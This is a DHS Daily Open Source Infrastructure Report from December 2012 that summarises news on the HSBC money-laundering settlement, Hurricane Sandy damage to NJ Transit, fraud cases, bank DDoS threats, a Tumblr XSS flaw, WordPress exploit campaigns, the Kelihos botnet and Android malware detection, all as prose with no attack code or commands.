Wednesday, December 12, 2012

Daily Report

Top Stories

 • HSBC agreed to pay a record $1.92 billion fine to settle a multi-year probe by U.S. prosecutors after being accused of failing to enforce rules designed to prevent the laundering of criminal cash, Reuters reported December 11. – Reuters  See item 6 below in the Banking and Finance Sector

 • The Associated Press reported December 11 that New Jersey Transit trains sustained about $100 million in damage from flooding during Hurricane Sandy after rail cars were stored in yards that models showed an 80 to 90 percent chance of not flooding, even with a massive storm bearing down on the region. – Associated Press

11. December 11, Associated Press – (New Jersey) NJ Transit chief: Train storage in storm ‘sound’. New Jersey Transit’s executive director December 11 defended his decision to store rail cars in Hoboken and Kearney to protect them during superstorm Sandy in October. He told the State Assembly’s Transportation Committee that rail yards in the two cities had never flooded before and that models showed an 80 to 90 percent chance the yards would not flood even with a massive storm bearing down on the region. It turned out the models were wrong, and NJ Transit trains sustained about $100 million in damage from flooding in the two storage yards. He said his agency is looking into places where rail cars and other equipment could be kept dry in case of future storms. The storm in New Jersey hit commuter trains particularly hard, shutting down key stations on the Port Authority Transportation Hub line between New York and New Jersey and flooding cars. As a consequence, rail lines across the State were still experiencing delays. A former official at the Long Island Railroad and Conrail said the rail car destruction in New Jersey — including damage to nearly one-fourth of its cars and locomotives — was largely preventable. Source:

 • A New York medical doctor pleaded guilty to an $11.7 million Medicare fraud scheme, admitting he exchanged spa services to Medicare beneficiaries that allowed their numbers to be billed for services never provided or not needed. – Insurance and Financial Advisor

21. December 11, Insurance and Financial Advisor – (New York) N.Y. doctor pleads guilty to $11.7M Medicare fraud scheme. A Flushing, New York medical doctor pleaded guilty to his role in an $11.7 million Medicare fraud scheme, Insurance and Financial Advisor reported December 11. Prosecutors said while president of URI Medical Service PC and Sarang Medical PC, the doctor purportedly provided physical therapy and electric stimulation treatment, and he admitted he exchanged spa services to Medicare beneficiaries that allowed their numbers to be billed for services never provided, or not needed. Source:

 • The Seattle Post-Intelligencer reported that prosecutors added 33 charges against the central figures in a financial scandal in Seattle Public Schools after auditors said in a new report they discovered an additional $1.3 million that may have been spent incorrectly. – Seattle Post-Intelligencer

24. December 10, Seattle Post-Intelligencer – (Washington) Figures in Seattle schools scandal face 33 new charges. Prosecutors added 33 charges against the central figures in a financial scandal in Seattle Public Schools, the Seattle Post-Intelligencer reported December 10. Two men now face 42 charges of either first- or second-degree theft. King County prosecutors originally charged the two men and a woman with stealing $250,000 from the Seattle schools program meant to encourage small firms to bid on district projects. State auditors examining the small-business development program found that $1.5 million in expenditures were questionable and that $280,000 was paid for work that was not done or did not benefit Seattle Public Schools. This fall auditors said in a new report that they may have turned up $1.3 million more that may have been spent incorrectly. Source:


Banking and Finance Sector

6. December 11, Reuters – (International) HSBC to pay $1.9 billion U.S. fine in money-laundering case. HSBC has agreed to pay a record $1.92 billion fine to settle a multi-year probe by U.S. prosecutors, who accused Europe’s biggest bank of failing to enforce rules designed to prevent the laundering of criminal cash, Reuters reported December 11. The U.S. Department of Justice (DOJ) charged the bank with failing to maintain an effective program against money laundering and conduct due diligence on certain accounts. It also charged the bank with violating sanctions laws by doing business with customers in Iran, Libya, Sudan, Burma, and Cuba. In an agreement with the DOJ, the bank will take steps to fix the problems, pay a fine of $1.256 billion, and retain a compliance monitor to resolve the charges through a deferred-prosecution agreement. Including penalties imposed by other agencies, the bank’s fines totaled $1.92 billion. HSBC also faces civil penalties, to be announced later December 11. The settlement offers new information about failures at HSBC to police transactions linked to Mexico, details of which were reported this summer in a U.S. Senate probe. Between 2006 and 2010, HSBC ignored money-laundering risks associated with certain Mexican customers and allowed at least $881 million in drug trafficking proceeds, including proceeds from the Sinaloa Cartel in Mexico and the Norte del Valle Cartel in Colombia, to be laundered through the bank, according to the agreement. HSBC said it expected to also reach a settlement with British watchdog the Financial Services Authority. Source:

7. December 11, BankInfoSecurity – (International) 5 banks targeted for new DDoS attacks. A hacktivist group responsible for previous distributed denial of service (DDoS) attacks against banks announced the “second phase” of its campaign, saying five major U.S. banks will be the victims of new DDoS attacks starting the week of December 10, BankInfoSecurity reported December 11. U.S. Bancorp, JPMorgan Chase, Bank of America, PNC Financial Services Group, and SunTrust Banks are the latest targets, according to the group, which announced its plans in a December 10 Pastepin posting. Each of these five banks suffered DDoS attacks during phase one of the hacktivist group’s campaign, which ran roughly from mid-September to mid-October. During that period, the group claimed responsibility for attacks on 10 major banks. Each institution was warned ahead of time, but none was able to completely fend off the attacks, which caused online banking outages of varying lengths. Source:

8. December 10, Softpedia – (International) Fraudsters are setting up bogus hotel websites, experts find. Experts from security firm Bitdefender inform that fraudulent hotel Web sites can help criminals in accomplishing various malicious tasks, including identity theft and money laundering, Softpedia reported December 10. In other cases, they might simply ask individuals who want to book a room to pay a certain amount of money upfront. The fake Web sites usually leverage the names and reputations of famous brands. Unlike phishing sites, these fraud Web sites are not promoted via email or social media spam. Instead, they are kept secret to ensure that the domain will not be seized by authorities. Source:

9. December 10, U.S. Department of Justice – (National) Former Dallas broker pleads guilty to defrauding investors through stock manipulation scheme. A former Dallas securities broker pleaded guilty December 10 for his role in a scheme to defraud thousands of investors through the manipulation of publicly traded stocks that created $44 million in illegal proceeds. The broker pleaded guilty in federal court in the Northern District of Oklahoma to one count of money laundering for laundering $250,000 in proceeds from the fraud. The broker was originally charged along with four other defendants in a 24-count indictment unsealed February 10, 2009. Prior to trial, he fled to Costa Rica, where he remained until he was extradited to the United States in May 2012. According to court documents and evidence presented at the 2010 trial, the defendants manipulated the stocks of three companies in a “pump and dump” scheme in which they manipulated the publicly traded penny stocks. The defendants and their nominees obtained significant profits by selling large amounts of shares after they had artificially inflated the stock price. For each of the three manipulated stocks, the co-conspirators’ sell-off caused declines of the stock price and left legitimate investors holding stock of significantly reduced value. Source:

Information Technology Sector

27. December 11, – (International) Google accidentally transmits self-destruct code to army of Chrome browsers. Google’s Gmail service went down for about 20 minutes December 10, which coincided with widespread reports that Google’s Chrome browser was also crashing. A Google engineer later confirmed the crashes were affecting Chrome users who were using another Google Web service known as Sync, and that Sync and other Google services were disrupted when Google misconfigured its load-balancing servers. The engineer wrote that a problem with Google’s Sync servers kicked off an error on the browser, which made Chrome abruptly shut down on the desktop. ”It’s due to a backend service that sync servers depend on becoming overwhelmed, and sync servers responding to that by telling all clients to throttle all data types,” he said. That “throttling” messed up things in the browser, causing it to crash. Source:

28. December 11, Softpedia – (International) Stored XSS that allowed hackers to hijack Tumblr blogs still unfixed. The stored cross-site scripting (XSS) vulnerability that allowed hackers to hijack Tumblr blogs remains unfixed, according to a security researcher. He explains that this vulnerability could be utilized for numerous cybercriminal operations. The stored XSS could be used for phishing, malware attacks, and even to spam users. The researcher also reveals some interesting facts about this particular stored XSS security hole. For instance, victims of attacks that exploit this vulnerability do not have to be logged in to Tumblr. Also, the bug could be used to spread a malicious payload because when an entry is reblogged, the payload is also included in the new post. Furthermore, arbitrary JavaScript can be executed in the victim’s browser from a remote location. Source:

29. December 11, – (International) Researchers warn of malware attack from WordPress exploit. Security experts are warning webmasters over a series of attacks targeting the WordPress and Joomla publishing platforms. The Sans Institute said that it has received reports of multiple exploit attempts on the platforms. The compromised sites are then injected with code which redirects to a third-party site. A Sans blogger and president of security firm Bambenek Consulting said that the attacks were particularly interesting for their method of attempting to exploit pages en masse by targeting servers. “The interesting thing to note is that it doesn’t seem to be a scanner exploiting one vulnerability but some tool that’s basically firing a bunch of Joomla and Wordpress exploits at a given server and hoping something hits,” he explained. Sans said that the compromised sites are used to redirect users to an attack site which tries to infect users with a phony antivirus package. Source:

30. December 11, Threatpost – (International) Kelihos update includes new TLD and USB infection capabilities. The Kelihos botnet is now relying on double fast-flux domains to spread spam and malware. According to an analysis from a researcher at, Kelihos has also switched top-level domains, moving to .ru from .eu. More insidious, however, is that it now has the ability to spread via removable drives such as USB storage devices. Once this latest update of Kelihos infects a computer, it connects with a .ru domain hosting its command and control looking for updates. The .ru domain is double fast-flux hosted, the researcher said. Once an updated version of Kelihos is sent to the infected machine, it will infect any removable drives attached to the computer by exploiting the same vulnerability as Stuxnet. The switch to .ru domains happened during the summer, according to the report, and the attackers have a lengthy list of sites from which to send new binaries updating the botnet, all of which are registered to REGGI-RU, a registrar in Russia. The botnet operators, however, are using a registrar in the Bahamas to register the name server domains providing DNS resolution to the Russian domains hosting malware. Kelihos boasts up to 150,000 spambots per day. Source:

31. December 11, CNET News – (International) Nokia engineer: Here’s how to hack Windows 8 games. A Nokia engineer posted an explanation on how the “use of innate Windows 8 security attack vectors” can allow a person with admittedly advanced knowledge to “compromise Windows 8 games revenue stream.” The hack, which can be completed in five multipart steps, does not necessarily highlight a security flaw that would leave users vulnerable. Instead, the hack shows the way in which hackers can get a paid game for free because of inherent flaws in the way in which apps are stored and handled by Windows 8. Source:

32. December 10, Bloomberg News – (International) Facebook restored after site maintenance disrupted some access. Facebook said it fixed an outage that left some users unable to access its social network while the company made a change to the site’s infrastructure December 10. ”We made a change to our DNS infrastructure, and that change resulted in some people being temporarily unable to reach the site,” a Facebook spokeswoman said in an emailed statement. “We detected and resolved the issue quickly, and we are now back to 100 percent.” Source:

33. December 10, The H – (International) Only 15% of known malware caught by Android 4.2’s verifier. A researcher at North Carolina State University found that only 15 percent of known malware samples tested on Android 4.2’s new app verification service were detected. The researcher loaded 1260 malware samples from the Android Malware Genome Project onto 10 Android 4.2 devices. Of the 1260 samples only 193 were detected as malware. The researcher also performed a test comparing Google’s verification against a range of ten different existing anti-virus applications through VirusTotal, looking at randomly selected malware samples from each malware family. The anti-virus applications run by VirusTotal ranged in efficacy from 100 percent to 51 percent, but the Android App verification system scored only 20.4 percent. The researcher noted that the app verification service uses a fragile mechanism of verifying SHA1 values from the app and package name to determine whether a package is dangerous or potentially dangerous. He also notes that the verification system relies on the server component, leaving the client-side of the system completely without detection capabilities. Source:

Communications Sector

Nothing to report.

Department of Homeland Security (DHS)
DHS Daily Open Source Infrastructure Report Contact Information

About the reports - The DHS Daily Open Source Infrastructure Report is a daily [Monday through Friday] summary of open-source published information concerning significant critical infrastructure issues. The DHS Daily Open Source Infrastructure Report is archived for ten days on the Department of Homeland Security Web site:

Contact Information

Content and Suggestions: Send mail to or contact the DHS Daily Report Team at (703)387-2314

Subscribe to the Distribution List: Visit the DHS Daily Open Source Infrastructure Report and follow instructions to Get e-mail updates when this information changes.

Removal from Distribution List:     Send mail to

Contact DHS

To report physical infrastructure incidents or to request information, please contact the National Infrastructure
Coordinating Center at or (202) 282-9201.

To report cyber infrastructure incidents or to request information, please contact US-CERT at or visit their Web page at v.

Department of Homeland Security Disclaimer

The DHS Daily Open Source Infrastructure Report is a non-commercial publication intended to educate and inform personnel engaged in infrastructure protection. Further reproduction or redistribution is subject to original copyright restrictions. DHS provides no warranty of ownership of the copyright, or accuracy with respect to the original source material.